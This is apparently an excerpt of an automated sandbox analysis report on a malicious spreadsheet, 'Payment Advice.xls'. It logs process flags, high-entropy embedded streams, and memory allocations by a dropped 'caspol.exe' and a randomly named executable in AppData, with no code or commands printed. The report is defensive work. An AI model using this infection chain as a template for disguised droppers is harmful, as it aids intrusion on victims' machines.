Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process information set: NOGPFAULTERRORBOX

Source: Payment Advice.xls	Stream path 'MBD001C4526/Package' entropy: 7.99631060239 (max. 8.0)
Source: Payment Advice.xls	Stream path 'Workbook' entropy: 7.99861998161 (max. 8.0)
Source: ~DFAAE5253A99F2DBD6.TMP.0.dr	Stream path 'Package' entropy: 7.9944596915 (max. 8.0)
Source: 2D330000.0.dr	Stream path 'MBD001C4526/Package' entropy: 7.9944596915 (max. 8.0)
Source: 2D330000.0.dr	Stream path 'Workbook' entropy: 7.99810434802 (max. 8.0)

Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory allocated: 1C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory allocated: 2520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory allocated: 350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory allocated: 5880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory allocated: 6880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory allocated: 69B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory allocated: 79B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Memory allocated: 1C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Memory allocated: 2610000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Memory allocated: 330000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Memory allocated: 59F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Memory allocated: 69F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Memory allocated: 6B30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Memory allocated: 7B30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory allocated: 190000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory allocated: 2490000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory allocated: 8D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory allocated: 5A60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory allocated: 5550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory allocated: 6A60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\caspol.exe	Memory allocated: 7A60000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
